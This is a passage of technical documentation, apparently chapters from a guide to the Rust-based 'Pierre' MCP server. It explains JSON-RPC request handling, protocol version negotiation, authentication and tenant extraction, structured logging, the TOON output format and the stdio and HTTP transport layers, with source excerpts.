The McpRequest and McpResponse types are aliases for JsonRpcRequest and JsonRpcResponse. This shows how Pierre’s unified JSON-RPC implementation supports multiple protocols (MCP, A2A) without duplication.
Initialize Handler
The initialize method validates protocol versions:
Source: src/mcp/protocol.rs:177-247
#![allow(unused)]
fn main() {
/// Internal initialize handler
fn handle_initialize_internal(
request: McpRequest,
resources: Option<&Arc<ServerResources>>,
) -> McpResponse {
let request_id = request.id.unwrap_or_else(default_request_id);
// Parse initialize request parameters
let Some(init_request) = request
.params
.as_ref()
.and_then(|params| serde_json::from_value::<InitializeRequest>(params.clone()).ok())
else {
return McpResponse::error(
Some(request_id),
ERROR_INVALID_PARAMS,
"Invalid initialize request parameters".to_owned(),
);
};
// Validate client protocol version
let client_version = &init_request.protocol_version;
let negotiated_version = if Self::SUPPORTED_VERSIONS.contains(&client_version.as_str()) {
// Use client version if supported
client_version.clone()
} else {
// Return error for unsupported versions
let supported_versions = Self::SUPPORTED_VERSIONS.join(", ");
return McpResponse::error(
Some(request_id),
ERROR_VERSION_MISMATCH,
format!("{MSG_VERSION_MISMATCH}. Client version: {client_version}, Supported versions: {supported_versions}")
);
};
info!(
"MCP version negotiated: {} (client: {}, server supports: {:?})",
negotiated_version,
client_version,
Self::SUPPORTED_VERSIONS
);
// Create successful initialize response with negotiated version
let init_response = if let Some(resources) = resources {
// Use dynamic HTTP port from server configuration
InitializeResponse::new_with_ports(
negotiated_version,
crate::constants::protocol::server_name_multitenant(),
SERVER_VERSION.to_owned(),
resources.config.http_port,
)
} else {
// Fallback to default (hardcoded port)
InitializeResponse::new(
negotiated_version,
crate::constants::protocol::server_name_multitenant(),
SERVER_VERSION.to_owned(),
)
};
match serde_json::to_value(&init_response) {
Ok(result) => McpResponse::success(Some(request_id), result),
Err(e) => {
error!("Failed to serialize initialize response: {}", e);
McpResponse::error(
Some(request_id),
ERROR_SERIALIZATION,
format!("{MSG_SERIALIZATION}: {e}"),
)
}
}
}
}
Protocol negotiation:
- Client sends
{"protocol_version": "2025-06-18"}in initialize request - Server checks if version is in
SUPPORTED_VERSIONS - If supported, use client’s version (allows newer clients)
- If unsupported, return
ERROR_VERSION_MISMATCHwith supported versions list
This forward-compatibility pattern allows adding new protocol versions without breaking old clients.
Ping Handler
The simplest MCP method returns an empty result:
Source: src/mcp/protocol.rs:250-253
#![allow(unused)]
fn main() {
/// Handle ping request
pub fn handle_ping(request: McpRequest) -> McpResponse {
let request_id = request.id.unwrap_or_else(default_request_id);
McpResponse::success(Some(request_id), serde_json::json!({}))
}
}
Usage:
Request: {"jsonrpc": "2.0", "method": "ping", "id": 1}
Response: {"jsonrpc": "2.0", "result": {}, "id": 1}
Clients use ping to test connectivity and measure latency.
tools/list Handler
The tools/list method returns available MCP tools:
Source: src/mcp/protocol.rs:256-261
#![allow(unused)]
fn main() {
/// Handle tools list request
pub fn handle_tools_list(request: McpRequest) -> McpResponse {
let tools = get_tools();
let request_id = request.id.unwrap_or_else(default_request_id);
McpResponse::success(Some(request_id), serde_json::json!({ "tools": tools }))
}
}
Response structure:
{
"jsonrpc": "2.0",
"result": {
"tools": [
{
"name": "get_activities",
"description": "Fetch fitness activities from connected providers",
"inputSchema": {...}
},
...
]
},
"id": 1
}
Error Handling Patterns
The platform uses consistent error handling across JSON-RPC methods:
Method Not Found
Source: src/mcp/protocol.rs:371-378
#![allow(unused)]
fn main() {
/// Handle unknown method request
pub fn handle_unknown_method(request: McpRequest) -> McpResponse {
let request_id = request.id.unwrap_or_else(default_request_id);
McpResponse::error(
Some(request_id),
ERROR_METHOD_NOT_FOUND,
format!("Unknown method: {}", request.method),
)
}
}
Invalid Params
#![allow(unused)]
fn main() {
return McpResponse::error(
Some(request_id),
ERROR_INVALID_PARAMS,
"Invalid initialize request parameters".to_owned(),
);
}
Authentication Errors
#![allow(unused)]
fn main() {
return McpResponse::error(
Some(request_id),
ERROR_AUTHENTICATION,
"Authentication token required".to_owned(),
);
}
Pattern: All error responses follow the same structure:
- Extract request ID (or use default for notifications)
- Call
McpResponse::error()with appropriate code - Include actionable error message
- Optionally add
datafield with details
MCP Version Compatibility
Pierre implements version negotiation during the initialize handshake to ensure compatibility with different MCP client versions.
Version Negotiation Flow
Client Server
│ │
│ ──── initialize ──────────────► │
│ { │
│ "method": "initialize", │
│ "params": { │
│ "protocolVersion": "2024-11-05",│
│ "clientInfo": {...} │
│ } │
│ } │
│ │
│ ◄──── initialized ──────────── │
│ { │
│ "result": { │
│ "protocolVersion": "2024-11-05",│ (echo or negotiate down)
│ "serverInfo": {...}, │
│ "capabilities": {...} │
│ } │
│ } │
└──────────────────────────────────────┘
Supported Protocol Versions
| Version | Status | Notes |
|---|---|---|
2024-11-05 | Current | Full feature support |
2024-10-07 | Supported | Backward compatible |
1.0 | Legacy | Basic tool support |
Version Handling Logic
#![allow(unused)]
fn main() {
/// Handle protocol version negotiation
fn negotiate_version(client_version: &str) -> Result<String, ProtocolError> {
match client_version {
// Current version - full support
"2024-11-05" => Ok("2024-11-05".to_owned()),
// Previous version - backward compatible
"2024-10-07" => Ok("2024-10-07".to_owned()),
// Legacy version - limited features
"1.0" | "1" => {
tracing::warn!(
client_version = client_version,
"Client using legacy MCP version, some features unavailable"
);
Ok("1.0".to_owned())
}
// Unknown version - try to continue with current
unknown => {
tracing::warn!(
client_version = unknown,
server_version = "2024-11-05",
"Unknown client version, attempting compatibility"
);
Ok("2024-11-05".to_owned())
}
}
}
}
Capability Negotiation
Different versions expose different capabilities:
#![allow(unused)]
fn main() {
/// Get capabilities for protocol version
fn capabilities_for_version(version: &str) -> ServerCapabilities {
match version {
"2024-11-05" => ServerCapabilities {
tools: true,
resources: true,
prompts: true,
logging: true,
experimental: Some(ExperimentalCapabilities {
a2a: true,
streaming: true,
}),
},
"2024-10-07" => ServerCapabilities {
tools: true,
resources: true,
prompts: false, // Not available in older version
logging: false,
experimental: None,
},
_ => ServerCapabilities::minimal(), // Basic tool support only
}
}
}
Breaking Changes Policy
Pierre follows semantic versioning for API changes:
Breaking changes (require major version bump):
- Removing a tool from the registry
- Changing tool parameter types
- Changing response structure
- Removing capabilities
Non-breaking changes (minor version):
- Adding new tools
- Adding optional parameters
- Adding new capabilities
- Adding new response fields
Deprecation process:
- Mark feature as deprecated in current version
- Log warnings when deprecated features are used
- Remove in next major version
- Document migration path in release notes
Client Version Detection
Pierre logs client information for compatibility tracking:
#![allow(unused)]
fn main() {
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ClientInfo {
pub name: String,
pub version: String,
}
// Example client identification
// Claude Desktop: {"name": "claude-desktop", "version": "0.7.0"}
// VSCode Copilot: {"name": "vscode-copilot", "version": "1.2.3"}
}
Forward Compatibility
For unknown future versions, Pierre:
- Logs a warning about unknown version
- Responds with current server version
- Excludes experimental features
- Allows basic tool operations
This ensures new clients can still use Pierre even if server hasn’t been updated.
Key Takeaways
-
JSON-RPC 2.0 foundation: Lightweight RPC protocol with 4 message types (request, response, error, notification). Transport-agnostic and bidirectional.
-
Unified implementation: Pierre uses one JSON-RPC implementation for MCP and A2A protocols, eliminating duplication.
-
Request structure: Contains
jsonrpc,method,params, andid. Pierre addsauth_token,headers, andmetadatafor authentication and multi-tenancy. -
Response structure: Contains
jsonrpc,resultorerror(mutually exclusive), andidmatching the request. -
Error codes: Standard codes (-32700 to -32600) for protocol errors. Server-specific codes (-32000 to -32099) for application errors.
-
Request correlation: The
idfield correlates requests with responses in async bidirectional communication. Notifications omitid(no response expected). -
Custom Debug implementation:
JsonRpcRequestredacts auth tokens in debug output to prevent token leakage in logs. -
Protocol versioning: MCP initialize method negotiates protocol version with client, allowing forward compatibility.
-
Extension fields: Pierre extends JSON-RPC with optional fields while maintaining spec compliance (fields are skipped if absent).
-
Type safety: Rust’s type system with serde ensures valid JSON-RPC messages. Invalid messages are caught at deserialization.
Next Chapter: Chapter 10: MCP Protocol Deep Dive - Request Flow - Learn how the Pierre platform routes MCP requests through authentication, tenant isolation, tool registry, and response serialization.
Chapter 10: MCP Protocol Deep Dive - Request Flow
MCP Request Lifecycle
Every MCP request flows through multiple processing layers:
┌────────────────────────────────────────────────────────────┐
│ MCP Client Request │
│ {"jsonrpc": "2.0", "method": "tools/call", ...} │
└────────────────────────┬───────────────────────────────────┘
│
▼
┌──────────────────────────┐
│ Transport Layer │ ← HTTP/WebSocket/stdio/SSE
│ (receives JSON bytes) │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ JSON Deserialization │ ← Parse to McpRequest
│ serde_json::from_str │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ McpRequestProcessor │ ← Validate and route
│ handle_request() │
└──────────────────────────┘
│
┌────────────────┴────────────────┐
│ │
▼ ▼
┌─────────────┐ ┌──────────────────┐
│ Notification│ │ Method Routing │
│ (no resp) │ │ initialize │
└─────────────┘ │ ping │
│ tools/list │
│ tools/call ───┐ │
└────────────────┼─┘
│
▼
┌──────────────────────────┐
│ Auth Middleware │
│ - Extract token │
│ - Validate JWT │
│ - Extract user_id │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Tenant Isolation │
│ - Extract tenant_id │
│ - Build TenantContext │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Tool Handler Dispatch │
│ - Route to specific tool│
│ - Execute with context │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Response Serialization │
│ McpResponse → JSON │
└──────────────────────────┘
│
▼
┌──────────────────────────┐
│ Transport Layer │
│ Send JSON bytes │
└──────────────────────────┘
Source: src/mcp/mcp_request_processor.rs:25-76
#![allow(unused)]
fn main() {
/// Processes MCP protocol requests with validation, routing, and execution
pub struct McpRequestProcessor {
resources: Arc<ServerResources>,
}
impl McpRequestProcessor {
/// Create a new MCP request processor
#[must_use]
pub const fn new(resources: Arc<ServerResources>) -> Self {
Self { resources }
}
/// Handle an MCP request and return a response
pub async fn handle_request(&self, request: McpRequest) -> Option<McpResponse> {
let start_time = std::time::Instant::now();
// Log request with optional truncation
Self::log_request(&request);
// Handle notifications (no response needed)
if request.method.starts_with("notifications/") {
Self::handle_notification(&request);
Self::log_completion("notification", start_time);
return None;
}
// Process request and generate response
let response = match self.process_request(request.clone()).await {
Ok(response) => response,
Err(e) => {
error!(
"Failed to process MCP request: {} | Request: method={}, jsonrpc={}, id={:?}",
e, request.method, request.jsonrpc, request.id
);
error!("Request params: {:?}", request.params);
error!("Full error details: {:#}", e);
McpResponse {
jsonrpc: JSONRPC_VERSION.to_owned(),
id: request.id.clone(),
result: None,
error: Some(McpError {
code: ERROR_INTERNAL_ERROR,
message: format!("Internal server error: {e}"),
data: None,
}),
}
}
};
Self::log_completion("request", start_time);
Some(response)
}
}
}
Flow:
- Start timer: Capture request start time for performance monitoring
- Log request: Record method, ID, and params (truncated for security)
- Check notifications: If method starts with “notifications/”, handle without response
- Process request: Validate, route, and execute
- Error handling: Convert
Result<McpResponse>toMcpResponsewith error - Log completion: Record duration in logs
- Return:
Some(response)for requests,Nonefor notifications
Rust Idiom: Option<McpResponse> return type
The handle_request method returns Option<McpResponse> instead of always returning a response. This explicitly represents “notifications don’t get responses” in the type system. The transport layer can then handle None by not sending anything.
Request Validation
The platform validates all requests before processing:
Source: src/mcp/mcp_request_processor.rs:96-111
#![allow(unused)]
fn main() {
/// Validate MCP request format and required fields
fn validate_request(request: &McpRequest) -> Result<()> {
if request.jsonrpc != JSONRPC_VERSION {
return Err(AppError::invalid_input(format!(
"Invalid JSON-RPC version: got '{}', expected '{}'",
request.jsonrpc, JSONRPC_VERSION
))
.into());
}
if request.method.is_empty() {
return Err(AppError::invalid_input("Missing method").into());
}
Ok(())
}
}
Validation rules:
jsonrpcmust be exactly"2.0"methodmust not be empty string- Other fields are optional (validated by method handlers)
Security: Validating jsonrpc version prevents processing malformed or legacy JSON-RPC 1.0 requests.
Method Routing
The processor routes requests to handlers based on the method field:
Source: src/mcp/mcp_request_processor.rs:78-94
#![allow(unused)]
fn main() {
/// Process an MCP request and generate response
async fn process_request(&self, request: McpRequest) -> Result<McpResponse> {
// Validate request format
Self::validate_request(&request)?;
// Route to appropriate handler based on method
match request.method.as_str() {
"initialize" => Ok(Self::handle_initialize(&request)),
"ping" => Ok(Self::handle_ping(&request)),
"tools/list" => Ok(Self::handle_tools_list(&request)),
"tools/call" => self.handle_tools_call(&request).await,
"authenticate" => Ok(Self::handle_authenticate(&request)),
method if method.starts_with("resources/") => Ok(Self::handle_resources(&request)),
method if method.starts_with("prompts/") => Ok(Self::handle_prompts(&request)),
_ => Ok(Self::handle_unknown_method(&request)),
}
}
}
Routing patterns:
- Exact match:
"initialize","ping","tools/list" - Async methods:
tools/callreturnsFuture(awaited) - Prefix match:
method.starts_with("resources/")for resource operations - Fallback:
_pattern returns “method not found” error
Rust Idiom: Guard clauses in match arms
The method if method.starts_with("resources/") pattern uses a guard clause to match all methods with a specific prefix. This is more flexible than enumerating every resource method.
MCP Protocol Handlers
Initialize Handler
The initialize method establishes the protocol connection:
Source: src/mcp/mcp_request_processor.rs:113-143
#![allow(unused)]
fn main() {
/// Handle MCP initialize request
fn handle_initialize(request: &McpRequest) -> McpResponse {
debug!("Handling initialize request");
let server_info = serde_json::json!({
"protocolVersion": crate::constants::protocol::mcp_protocol_version(),
"capabilities": {
"tools": {
"listChanged": true
},
"resources": {
"subscribe": true,
"listChanged": true
},
"prompts": {
"listChanged": true
}
},
"serverInfo": {
"name": "pierre-mcp-server",
"version": env!("CARGO_PKG_VERSION")
}
});
McpResponse {
jsonrpc: JSONRPC_VERSION.to_owned(),
id: request.id.clone(),
result: Some(server_info),
error: None,
}
}
}
Response structure:
{
"jsonrpc": "2.0",
"result": {
"protocolVersion": "2025-06-18",
"capabilities": {
"tools": {"listChanged": true},
"resources": {"subscribe": true, "listChanged": true},
"prompts": {"listChanged": true}
},
"serverInfo": {
"name": "pierre-mcp-server",
"version": "0.1.0"
}
},
"id": 1
}
Capabilities:
tools.listChanged: Server notifies when tool list changesresources.subscribe: Clients can subscribe to resource updatesresources.listChanged: Server notifies when resource list changesprompts.listChanged: Server notifies when prompt list changes
Rust Idiom: env!("CARGO_PKG_VERSION")
The env!() macro reads Cargo.toml version at compile time. This ensures the server version in responses always matches the actual build version.
Ping Handler
The ping method tests connectivity:
Source: src/mcp/mcp_request_processor.rs:145-155
#![allow(unused)]
fn main() {
/// Handle MCP ping request
fn handle_ping(request: &McpRequest) -> McpResponse {
debug!("Handling ping request");
McpResponse {
jsonrpc: JSONRPC_VERSION.to_owned(),
id: request.id.clone(),
result: Some(serde_json::json!({})),
error: None,
}
}
}
Usage: Clients use ping to measure latency and verify the server is responsive.
tools/list Handler
The tools/list method returns available tools:
Source: src/mcp/mcp_request_processor.rs:174-193
#![allow(unused)]
fn main() {
/// Handle tools/list request
///
/// Per MCP specification, tools/list does NOT require authentication.
/// All tools are returned regardless of authentication status.
/// Individual tool calls will check authentication and trigger OAuth if needed.
fn handle_tools_list(request: &McpRequest) -> McpResponse {
debug!("Handling tools/list request");
// Get all available tools from schema
// MCP spec: tools/list must work without authentication
// Authentication is checked at tools/call time, not discovery time
let tools = crate::mcp::schema::get_tools();
McpResponse {
jsonrpc: JSONRPC_VERSION.to_owned(),
id: request.id.clone(),
result: Some(serde_json::json!({ "tools": tools })),
error: None,
}
}
}
Note: Per MCP spec, tools/list does not require authentication. This allows AI assistants to discover available tools before users authenticate. Authentication is enforced at tools/call time.
tools/call Handler
The tools/call method executes a specific tool:
Source: src/mcp/mcp_request_processor.rs:195-217
#![allow(unused)]
fn main() {
/// Handle tools/call request
async fn handle_tools_call(&self, request: &McpRequest) -> Result<McpResponse> {
debug!("Handling tools/call request");
request
.params
.as_ref()
.ok_or_else(|| AppError::invalid_input("Missing parameters for tools/call"))?;
// Execute tool using static method - delegate to ToolHandlers
let handler_request = McpRequest {
jsonrpc: request.jsonrpc.clone(),
method: request.method.clone(),
params: request.params.clone(),
id: request.id.clone(),
auth_token: request.auth_token.clone(),
headers: request.headers.clone(),
metadata: HashMap::new(),
};
let response =
ToolHandlers::handle_tools_call_with_resources(handler_request, &self.resources).await;
Ok(response)
}
}
Delegation: The tools/call handler delegates to ToolHandlers::handle_tools_call_with_resources which performs authentication and tool dispatch.
Authentication Extraction
The tool handler extracts authentication tokens from multiple sources:
Source: src/mcp/tool_handlers.rs:63-101
#![allow(unused)]
fn main() {
#[tracing::instrument(
skip(request, resources),
fields(
method = %request.method,
request_id = ?request.id,
tool_name = tracing::field::Empty,
user_id = tracing::field::Empty,
tenant_id = tracing::field::Empty,
success = tracing::field::Empty,
duration_ms = tracing::field::Empty,
)
)]
pub async fn handle_tools_call_with_resources(
request: McpRequest,
resources: &Arc<ServerResources>,
) -> McpResponse {
// Extract auth token from either HTTP Authorization header or MCP params
let auth_token_string = request
.params
.as_ref()
.and_then(|params| params.get("token"))
.and_then(|token| token.as_str())
.map(|mcp_token| format!("Bearer {mcp_token}"));
let auth_token = request
.auth_token
.as_deref()
.or(auth_token_string.as_deref());
debug!(
"MCP tool call authentication attempt for method: {} (token source: {})",
request.method,
if request.auth_token.is_some() {
"HTTP header"
} else {
"MCP params"
}
);
}
Token sources (in priority order):
- HTTP header:
request.auth_token(fromAuthorization: Bearer <token>) - MCP params:
request.params.token(passed in JSON-RPC params)
Design pattern: Checking multiple sources allows flexibility:
- WebSocket/HTTP clients use HTTP Authorization header
- stdio clients pass token in MCP params (no HTTP headers available)
Rust Idiom: or() for fallback
The expression request.auth_token.as_deref().or(auth_token_string.as_deref()) tries the first source, then falls back to the second if None. This is more concise than if let chains.
Authentication and Tenant Extraction
After extracting the token, the handler authenticates and extracts tenant context:
Source: src/mcp/tool_handlers.rs:103-160
#![allow(unused)]
fn main() {
match resources
.auth_middleware
.authenticate_request(auth_token)
.await
{
Ok(auth_result) => {
// Record authentication success in span
tracing::Span::current()
.record("user_id", auth_result.user_id.to_string())
.record("tenant_id", auth_result.user_id.to_string()); // Use user_id as tenant_id for now
info!(
"MCP tool call authentication successful for user: {} (method: {})",
auth_result.user_id,
auth_result.auth_method.display_name()
);
// Update user's last active timestamp
if let Err(e) = resources
.database
.update_last_active(auth_result.user_id)
.await
{
tracing::warn!(
user_id = %auth_result.user_id,
error = %e,
"Failed to update user last active timestamp (activity tracking impacted)"
);
}
// Extract tenant context from request and auth result
let tenant_context = crate::mcp::tenant_isolation::extract_tenant_context_internal(
&resources.database,
Some(auth_result.user_id),
None,
None, // MCP transport headers not applicable here
)
.await
.inspect_err(|e| {
tracing::warn!(
user_id = %auth_result.user_id,
error = %e,
"Failed to extract tenant context - tool will execute without tenant isolation"
);
})
.ok()
.flatten();
// Use the provided ServerResources directly
Self::handle_tool_execution_direct(request, auth_result, tenant_context, resources)
.await
}
Err(e) => {
tracing::Span::current().record("success", false);
Self::handle_authentication_error(request, &e)
}
}
}
Flow:
- Authenticate: Validate JWT token with
auth_middleware.authenticate_request - Record span: Add
user_idandtenant_idto tracing span - Update last active: Record user activity timestamp
- Extract tenant: Look up tenant context for multi-tenancy
- Execute tool: Dispatch to specific tool handler
- Handle errors: Return authentication error response
Rust Idiom: inspect_err for side effects
The inspect_err(|e| { tracing::warn!(...) }) method logs errors without affecting the Result chain. This is cleaner than:
#![allow(unused)]
fn main() {
match tenant_context {
Err(e) => {
tracing::warn!(...);
Err(e)
}
ok => ok
}
}
Tool Handler Dispatch
The tool execution handler routes to specific tool implementations:
Source: src/mcp/tool_handlers.rs:173-200
#![allow(unused)]
fn main() {
async fn handle_tool_execution_direct(
request: McpRequest,
auth_result: AuthResult,
tenant_context: Option<TenantContext>,
resources: &Arc<ServerResources>,
) -> McpResponse {
let Some(params) = request.params else {
error!("Missing request parameters in tools/call");
return McpResponse {
jsonrpc: "2.0".to_owned(),
id: request.id,
result: None,
error: Some(McpError {
code: ERROR_INVALID_PARAMS,
message: "Invalid params: Missing request parameters".to_owned(),
data: None,
}),
};
};
let tool_name = params["name"].as_str().unwrap_or("");
let args = ¶ms["arguments"];
let user_id = auth_result.user_id;
// Record tool name in span
tracing::Span::current().record("tool_name", tool_name);
let start_time = std::time::Instant::now();
}
Parameter extraction:
params["name"]: Tool name (e.g., “get_activities”)params["arguments"]: Tool arguments as JSONauth_result.user_id: Authenticated user
The handler then dispatches to tool-specific functions based on tool_name.
Notification Handling
Notifications are requests without responses:
Source: Inferred from src/mcp/mcp_request_processor.rs:44-49
#![allow(unused)]
fn main() {
// Handle notifications (no response needed)
if request.method.starts_with("notifications/") {
Self::handle_notification(&request);
Self::log_completion("notification", start_time);
return None;
}
}
MCP notification methods:
notifications/progress: Progress updates for long-running operationsnotifications/cancelled: Cancellation signalsnotifications/message: Log messages
Return value: None indicates no response should be sent. The transport layer handles this by not writing to the connection.
Structured Logging
The platform uses tracing spans for structured logging:
Source: src/mcp/tool_handlers.rs:64-75
#![allow(unused)]
fn main() {
#[tracing::instrument(
skip(request, resources),
fields(
method = %request.method,
request_id = ?request.id,
tool_name = tracing::field::Empty,
user_id = tracing::field::Empty,
tenant_id = tracing::field::Empty,
success = tracing::field::Empty,
duration_ms = tracing::field::Empty,
)
)]
}
Span fields:
method: MCP method name (always present)request_id: Request correlation ID (always present)tool_name: Filled in after extracting from paramsuser_id: Filled in after authenticationtenant_id: Filled in after tenant extractionsuccess: Filled in after tool executionduration_ms: Filled in before returning
Recording values:
#![allow(unused)]
fn main() {
tracing::Span::current().record("tool_name", tool_name);
tracing::Span::current().record("user_id", auth_result.user_id.to_string());
tracing::Span::current().record("success", true);
}
Error Handling Patterns
The platform converts Result<McpResponse> to McpResponse with errors:
Source: src/mcp/mcp_request_processor.rs:52-72
#![allow(unused)]
fn main() {
let response = match self.process_request(request.clone()).await {
Ok(response) => response,
Err(e) => {
error!(
"Failed to process MCP request: {} | Request: method={}, jsonrpc={}, id={:?}",
e, request.method, request.jsonrpc, request.id
);
error!("Request params: {:?}", request.params);
error!("Full error details: {:#}", e);
McpResponse {
jsonrpc: JSONRPC_VERSION.to_owned(),
id: request.id.clone(),
result: None,
error: Some(McpError {
code: ERROR_INTERNAL_ERROR,
message: format!("Internal server error: {e}"),
data: None,
}),
}
}
};
}
Error logging:
- Error message with context
- Request details (method, jsonrpc, id)
- Request params (may contain sensitive data, use
debuglevel) - Full error chain with
{:#}formatter
Response structure: All errors return ERROR_INTERNAL_ERROR (-32603) code. More specific codes (METHOD_NOT_FOUND, INVALID_PARAMS) are returned by individual handlers.
Output Formatters (TOON Support)
Pierre supports multiple output formats for tool responses, optimized for different consumers.
Source: src/formatters/mod.rs
#![allow(unused)]
fn main() {
/// Output serialization format selector
#[derive(Debug, Clone, Copy, PartialEq, Eq, Default)]
pub enum OutputFormat {
/// JSON format (default) - universal compatibility
#[default]
Json,
/// TOON format - Token-Oriented Object Notation for LLM efficiency
/// Achieves ~40% token reduction compared to JSON
Toon,
}
impl OutputFormat {
/// Parse format from string parameter (case-insensitive)
#[must_use]
pub fn from_str_param(s: &str) -> Self {
match s.to_lowercase().as_str() {
"toon" => Self::Toon,
_ => Self::Json,
}
}
/// Get the MIME content type for this format
#[must_use]
pub const fn content_type(&self) -> &'static str {
match self {
Self::Json => "application/json",
Self::Toon => "application/vnd.toon",
}
}
}
}
Why TOON?
When LLMs process large datasets (e.g., a year of fitness activities), token count directly impacts:
- API costs (tokens × price per token)
- Context window usage (limited tokens available)
- Response latency (more tokens = slower processing)
TOON achieves ~40% token reduction by:
- Eliminating redundant JSON syntax (quotes, colons, commas)
- Using whitespace-based structure
- Preserving semantic meaning for LLM comprehension
Usage in tools:
#![allow(unused)]
fn main() {
use crate::formatters::{format_output, OutputFormat};
// Tool receives format preference from client
let format = params.output_format
.map(|s| OutputFormat::from_str_param(&s))
.unwrap_or_default();
// Serialize response in requested format
let output = format_output(&activities, format)?;
// output.data contains the serialized string
// output.content_type contains the MIME type
}
Format comparison:
// JSON (default): 847 tokens for 100 activities
{"activities":[{"id":"act_001","type":"Run","distance":5000,...},...]}
// TOON (~40% fewer tokens): 508 tokens for same data
activities
act_001
type Run
distance 5000
...
Key Takeaways
-
Request lifecycle: MCP requests flow through transport → deserialization → validation → routing → authentication → tenant extraction → tool execution → serialization → transport.
-
Validation first: All requests are validated for
jsonrpcversion andmethodfield before routing. -
Method routing: Pattern matching on
methodstring with exact match, async methods, prefix match, and fallback. -
Authentication sources: Tokens extracted from HTTP Authorization header (WebSocket/HTTP) or MCP params (stdio).
-
Notification handling: Requests with
method.starts_with("notifications/")returnNone(no response sent). -
Structured logging:
#[tracing::instrument]with empty fields filled during processing provides comprehensive observability. -
Tenant extraction: After authentication, platform looks up user’s tenant for multi-tenant isolation.
-
Error conversion:
Result<McpResponse>converted toMcpResponsewith error field for all failures. -
Tool dispatch:
tools/calldelegates toToolHandlerswhich routes to specific tool implementations. -
Performance monitoring: Request duration measured from start to completion, recorded in logs.
Next Chapter: Chapter 11: MCP Transport Layers - Learn how the Pierre platform supports multiple transport mechanisms (HTTP, stdio, WebSocket, SSE) for MCP communication.
Chapter 11: MCP Transport Layers
Transport Abstraction Overview
MCP is transport-agnostic - the same JSON-RPC messages work over any transport:
┌──────────────────────────────────────────────────────────┐
│ MCP Protocol Layer │
│ (JSON-RPC requests/responses) │
└─────────────────┬────────────────────────────────────────┘
│
┌───────────┼───────────┬────────────┬────────────┐
│ │ │ │ │
▼ ▼ ▼ ▼ ▼
┌──────────┐ ┌────────┐ ┌────────┐ ┌────────┐ ┌────────┐
│ stdio │ │ HTTP │ │ SSE │ │ WS │ │Sampling│
│ (Direct) │ │ (API) │ │(Notify)│ │(Bidir) │ │ (LLM) │
└──────────┘ └────────┘ └────────┘ └────────┘ └────────┘
Source: src/mcp/transport_manager.rs:24-39
#![allow(unused)]
fn main() {
/// Manages multiple transport methods for MCP communication
pub struct TransportManager {
resources: Arc<ServerResources>,
notification_sender: broadcast::Sender<OAuthCompletedNotification>,
}
impl TransportManager {
/// Create a new transport manager with shared resources
#[must_use]
pub fn new(resources: Arc<ServerResources>) -> Self {
let (notification_sender, _) = broadcast::channel(100);
Self {
resources,
notification_sender,
}
}
}
Design: Single TransportManager coordinates all transports using broadcast::channel for notifications.
HTTP Transport
HTTP transport serves MCP over REST endpoints:
Source: src/mcp/transport_manager.rs:103-128
#![allow(unused)]
fn main() {
/// Run HTTP server with restart on failure
async fn run_http_server_loop(shared_resources: Arc<ServerResources>, port: u16) -> ! {
loop {
info!("Starting unified Axum HTTP server on port {}", port);
let server = super::multitenant::MultiTenantMcpServer::new(shared_resources.clone());
let result = server
.run_http_server_with_resources_axum(port, shared_resources.clone())
.await;
Self::handle_server_restart(result).await;
}
}
async fn handle_server_restart(result: AppResult<()>) {
match result {
Ok(()) => {
error!("HTTP server unexpectedly completed - restarting in 5 seconds...");
sleep(Duration::from_secs(5)).await;
}
Err(e) => {
error!("HTTP server failed: {} - restarting in 10 seconds...", e);
sleep(Duration::from_secs(10)).await;
}
}
}
}
Features:
- Axum web framework for routing
- REST endpoints for MCP methods
- CORS support for web clients
- TLS/HTTPS support (production)
- Rate limiting per endpoint
Typical endpoints:
POST /mcp/initialize - Initialize MCP session
POST /mcp/tools/list - List available tools
POST /mcp/tools/call - Execute tool
GET /mcp/ping - Health check
GET /oauth/authorize - OAuth flow start
POST /oauth/callback - OAuth callback
Stdio Transport (Direct MCP)
Pierre includes a native Rust stdio transport for direct MCP communication without HTTP overhead:
Source: src/mcp/transport_manager.rs:155-165
#![allow(unused)]
fn main() {
/// Handles stdio transport for MCP communication
pub struct StdioTransport {
resources: Arc<ServerResources>,
}
impl StdioTransport {
/// Creates a new stdio transport instance
#[must_use]
pub const fn new(resources: Arc<ServerResources>) -> Self {
Self { resources }
}
}
Message processing loop:
Source: src/mcp/transport_manager.rs:245-291
#![allow(unused)]
fn main() {
/// Run stdio transport for MCP communication
pub async fn run(
&self,
notification_receiver: broadcast::Receiver<OAuthCompletedNotification>,
) -> AppResult<()> {
info!("MCP stdio transport ready - listening on stdin/stdout with sampling support");
let stdin_handle = stdin();
let mut lines = BufReader::new(stdin_handle).lines();
let sampling_peer = self.resources.sampling_peer.clone();
// Spawn notification handler
let notification_handle = tokio::spawn(async move {
Self::handle_stdio_notifications(notification_receiver, resources_for_notifications).await
});
while let Some(line) = lines.next_line().await? {
if line.trim().is_empty() {
continue;
}
match serde_json::from_str::<serde_json::Value>(&line) {
Ok(message) => {
Self::process_stdio_message(
message,
self.resources.clone(),
sampling_peer.as_ref(),
).await;
}
Err(e) => {
warn!("Invalid JSON-RPC message: {}", e);
println!("{}", Self::parse_error_response());
}
}
}
// Cleanup on exit
if let Some(peer) = &sampling_peer {
peer.cancel_all_pending().await;
}
notification_handle.abort();
Ok(())
}
}
Stdio characteristics:
- Bidirectional: Full JSON-RPC over stdin/stdout
- Line-based: One JSON message per line
- BufReader: Efficient buffered reading
- MCP Sampling: Supports server-initiated LLM requests
- Concurrent startup: Runs alongside HTTP/SSE transports
MCP Sampling support:
The stdio transport includes special handling for MCP Sampling - a protocol feature allowing servers to request LLM completions from clients:
Source: src/mcp/transport_manager.rs:167-200
#![allow(unused)]
fn main() {
/// Check if a JSON message is a sampling response
fn is_sampling_response(message: &serde_json::Value) -> bool {
message.get("id").is_some()
&& message.get("method").is_none()
&& (message.get("result").is_some() || message.get("error").is_some())
}
/// Route a sampling response to the sampling peer
async fn route_sampling_response(
message: &serde_json::Value,
sampling_peer: Option<&Arc<super::sampling_peer::SamplingPeer>>,
) {
let Some(peer) = sampling_peer else {
warn!("Received sampling response but no sampling peer available");
return;
};
let id = message.get("id").cloned().unwrap_or(serde_json::Value::Null);
let result = message.get("result").cloned();
let error = message.get("error").cloned();
match peer.handle_response(id, result, error).await {
Ok(handled) if !handled => {
warn!("Received response for unknown sampling request");
}
